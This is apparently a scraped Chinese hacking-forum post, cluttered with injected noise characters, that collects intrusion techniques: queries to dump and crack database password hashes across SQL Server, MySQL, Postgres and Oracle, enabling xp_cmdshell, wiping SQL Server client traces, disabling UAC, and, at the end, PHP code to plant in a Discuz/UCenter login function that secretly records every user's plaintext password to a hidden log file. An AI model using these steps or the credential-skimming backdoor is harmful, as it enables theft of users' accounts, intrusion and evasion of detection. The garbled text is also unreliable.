: [ T6 Y* m G5 P# a' J0 }
各种类型数据库抓HASH破解最高权限密码!
& \' n: _9 o1 L1.sql server2000- P( t: N! V" d0 M/ \# c' @
SELECT password from master.dbo.sysxlogins where name='sa'# ^$ v+ }# s( C- j& K9 u. s4 B
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
+ _! N) X. J6 E! Q& S8 `% i2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
! K- r; [( O3 g7 v" T4 k* i6 t
+ T$ g+ F/ n' p9 Q, z8 d+ w: A0×0100- constant header
8 k3 K8 X8 `7 z3 q& [8 p34767D5C- salt
7 P$ A! J* w5 C5 i+ F8 n: z0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash6 R2 t% s' o4 V; |5 @3 x- a
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
" P8 p: L& ~) v) p4 Ocrack the upper case hash in ‘cain and abel’ and then work the case sentive hash( y8 F2 `: ?% t2 G A
SQL server 2005:-
( W2 U6 e* E+ }0 h" mSELECT password_hash FROM sys.sql_logins where name='sa'
& j* T2 j, r# J0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
4 K$ [! p% F3 O% t3 Z0×0100- constant header
! r2 f! v! S9 ]* @, R993BF231-salt u7 {! v5 i" q
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
: M% h5 R8 u; G% d' y; }; p* mcrack case sensitive hash in cain, try brute force and dictionary based attacks.8 z- r: G8 c3 O2 A
# o! C& Q& h- {. F' T% a7 l* l; pupdate:- following bernardo’s comments:-
0 C6 S" |2 b* H- ~2 f; U# a+ Ause function fn_varbintohexstr() to cast password in a hex string.
) i1 v; M% b! L Y/ ]e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins$ T: V0 f! {. z4 n6 e& | K3 b
; g8 B8 f1 A/ H3 {; ]+ ^MYSQL:-
/ C+ E9 [( j, i& v
: y) \. W: T. U4 D' WIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
& |# s8 g8 `2 u8 O! }0 m8 P+ H
8 z( f* ?. }& N4 f' [3 u*mysql < 4.1+ D; S- F0 N& G( O x6 P
- s9 |4 Z: L$ l$ _; Q2 n! S
mysql> SELECT PASSWORD(‘mypass’);( T" _( q" ?/ q. ~& }
+——————–+
! n; B9 Z' t5 P/ F! v7 ~| PASSWORD(‘mypass’) |
! d' M Y' p- p6 ?" H: f+——————–+
6 i# }; U5 P5 {2 i: a/ m$ m/ L8 z| 6f8c114b58f2ce9e |, a+ B9 ?/ k) T4 q/ h+ C
+——————–+) x3 n/ L) \' X; x3 N) ~& u
3 f9 R2 s! f% L% y& H4 f4 B*mysql >=4.1- H1 F$ e" [' D
. w+ v! M7 j# w& U9 l) c5 X
mysql> SELECT PASSWORD(‘mypass’);6 j F! I5 F! p, b/ t
+——————————————-+% T. R8 b( }$ n5 ]' b
| PASSWORD(‘mypass’) |2 m6 D4 G }6 ]: ^ H# l
+——————————————-+ {- I z- P5 H, l" t% s( M# z/ z2 |
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
9 f, n3 {: v- B1 x: Q+——————————————-+7 v, H9 k+ n$ w0 w/ y6 m6 x
- i. p2 e9 {8 z. r8 h
Select user, password from mysql.user8 b& @9 x" K9 Z* O
The hashes can be cracked in ‘cain and abel’
' Z% ?& T* O- F
, h5 M; N! C! W8 m0 PPostgres:-1 J2 p* I+ ?9 y4 Q2 o, w4 \
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
! t8 I4 `) X1 E; ?select usename, passwd from pg_shadow;- h/ v8 f& ]$ Q
usename | passwd
: H) h+ P1 j% O S: B, D0 t1 S——————+————————————-
7 Q1 W c+ x7 ~, h, {2 ?% Mtestuser | md5fabb6d7172aadfda4753bf0507ed4396
1 f6 Q5 |% B- O& N" S0 F: J4 Guse mdcrack to crack these hashes:-
( \! w8 @ S* {/ T$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43962 |& L. ]+ L! M; f* X( \3 l
' x' t8 u. ]7 v+ E/ ]$ {; AOracle:-
% x/ Z5 y2 }7 P, a' ?# b/ Vselect name, password, spare4 from sys.user$
- P, ^) Q& b/ Z, m+ ]# ohashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
$ l( V/ L; s) {* i+ R" |4 AMore on Oracle later, i am a bit bored….
7 _* Z/ i% d' i: H, a Q5 P) N4 R7 n- D
' @7 q6 v7 O# F0 `
在sql server2005/2008中开启xp_cmdshell
$ T, \ y4 G9 W u-- To allow advanced options to be changed.
0 [8 Z: B2 b" ]7 i' _( R sEXEC sp_configure 'show advanced options', 1
, I& W- i6 ~" x: k. F* |: oGO
2 d9 J# W' O4 l' A: y( h2 y-- To update the currently configured value for advanced options." ^/ o! n* Z: k2 n
RECONFIGURE
- z1 f1 V* _: s( a T9 Y' dGO
' V3 L1 |& o H- F-- To enable the feature.
3 ?- I$ q3 z7 C- m6 zEXEC sp_configure 'xp_cmdshell', 1
8 H) I0 G( ?+ k8 GGO3 Z: a- I8 E4 S b1 V5 e: r
-- To update the currently configured value for this feature.- E% L( N9 c+ z) D: O4 }3 E
RECONFIGURE
" a. @; M b, h/ p: b) \1 ^GO
0 v( w8 o/ k+ T- X+ dSQL 2008 server日志清除,在清楚前一定要备份。
' \) [. v3 r9 M1 P; ]如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
/ x5 l' h& v, h9 UX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin9 q5 S% G, [) N! ]0 u( J+ e
( Q, j6 z& G8 l/ A& z2 `
对于SQL Server 2008以前的版本:
8 J0 ~# X, i" W( gSQL Server 2005:
3 z) G# a' f+ Z3 F删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat# r* a* s) I+ a; n y4 ~& W, x" z
SQL Server 2000:
- ~! _- ]& Z6 u& g清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。+ T8 H: U1 \; j3 R+ w$ \
* S, U* @7 N9 ~& t7 T3 ?! X" t; D' z
本帖最后由 simeon 于 2013-1-3 09:51 编辑
( Y. G2 X; v! A" ^. g, e9 A5 l% n& n4 T. p
3 W4 l2 y# M% _! _8 g0 L0 ]& bwindows 2008 文件权限修改$ Z- i; W& ?' \
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx. c9 s* z: t" d, ~) Z1 ~
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad989 e Z$ \2 @$ v# P. m7 H7 F; H3 J
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
) D. h: s! k8 [. v+ E& k
. @5 @4 u `4 |8 @( fWindows Registry Editor Version 5.00
0 b; U- x9 z( G3 a& }$ ?9 }[HKEY_CLASSES_ROOT\*\shell\runas]
( j9 k/ M" k8 I1 f8 F$ \@="管理员取得所有权": U, g+ S2 {: T" e/ @7 ?$ _9 s0 f
"NoWorkingDirectory"="", h. s( p% \7 S, F% s G# N
[HKEY_CLASSES_ROOT\*\shell\runas\command]; y5 V0 ~; _ ]2 E; B$ E
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F") b0 \+ V+ i% [( ]3 H8 z% P- H- ~
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 q. J2 N" j2 m[HKEY_CLASSES_ROOT\exefile\shell\runas2]
7 D) X! b7 ]2 L5 L, S@="管理员取得所有权"
+ P" o8 b+ l) `# N"NoWorkingDirectory"=""2 `4 k# g. j! J$ C: J9 d N! K d
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]9 g( T9 G! U$ P: R
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"% f# d$ ^* M3 d9 U$ R8 _; f
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* R# o; ^7 r+ A+ d3 W2 W0 ~- R" z
9 R: X$ C$ X2 J O[HKEY_CLASSES_ROOT\Directory\shell\runas]6 j- K* K: A, J) L
@="管理员取得所有权"
3 k; E$ K1 p8 \ c2 @7 Q"NoWorkingDirectory"=""
# [& t) i) B9 }; P[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
+ J, Q7 d3 D ~( _+ F@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
3 Q/ b) b1 A( `$ j"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"1 \ @/ r& t5 j% z8 i& [
% A% G8 e3 k( ]0 Q* U( r( O
7 E( @; O. ]+ C3 P% [win7右键“管理员取得所有权”.reg导入
% c: }! ?: j9 S1 F. Y% ^) v( \二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,6 s0 e5 X) X# I' v4 J: z
1、C:\Windows这个路径的“notepad.exe”不需要替换
# k; b, d9 G; A; f2 C3 B/ t0 Q, Z2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
) Y; s( w3 A. z3、四个“notepad.exe.mui”不要管
. G9 A f4 ^+ `! Q0 K3 v: _2 C4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
, a1 ?/ _& [3 P0 T7 R! r8 ]C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
4 W4 A2 n) w9 n' q- B: C4 ~4 W替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
% x# S+ V: H( x7 J) B替换完之后回到桌面,新建一个txt文档打开看看是不是变了。0 ^- c* T0 l' _" \0 L6 c
windows 2008中关闭安全策略:
4 Y1 k$ u+ c* Y1 treg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9 q8 T- ^6 p* Q7 m: X
修改uc_client目录下的client.php 在
+ D _5 Z. x0 i9 pfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
- k, A5 _7 J7 n0 o/ s下加入如上代码,在网站./data/cache/目录下自动生成csslog.php6 k- x! W- K6 k
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
$ ^$ n* A, B/ q8 L" Jif(getenv('HTTP_CLIENT_IP')) {, [# q- q- b- y$ ^" B* C
$onlineip = getenv('HTTP_CLIENT_IP');
+ x- f* G8 t- e& z* E) {) H4 r} elseif(getenv('HTTP_X_FORWARDED_FOR')) {6 w7 V- p6 o' |, n! ~4 z
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
" p+ j6 c$ k( Y1 d. d9 G$ W} elseif(getenv('REMOTE_ADDR')) {
2 ^1 L% x: T6 w! K: C; |$onlineip = getenv('REMOTE_ADDR');
- Q: ?/ z4 t: ?' a} else {8 e: C8 Q1 v8 l$ |, B, @1 ^. p: A
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
6 H5 ?+ ], n6 d ^1 R$ p7 D}4 G( {1 B2 Z6 a7 ?
$showtime=date("Y-m-d H:i:s"); }8 R$ y7 a- ~3 i/ S: R5 f
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n"; E- t: C9 e: y- e; D, C, R0 d
$handle=fopen('./data/cache/csslog.php','a+');
! Q9 V8 Y3 s5 R$ b8 m/ U $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对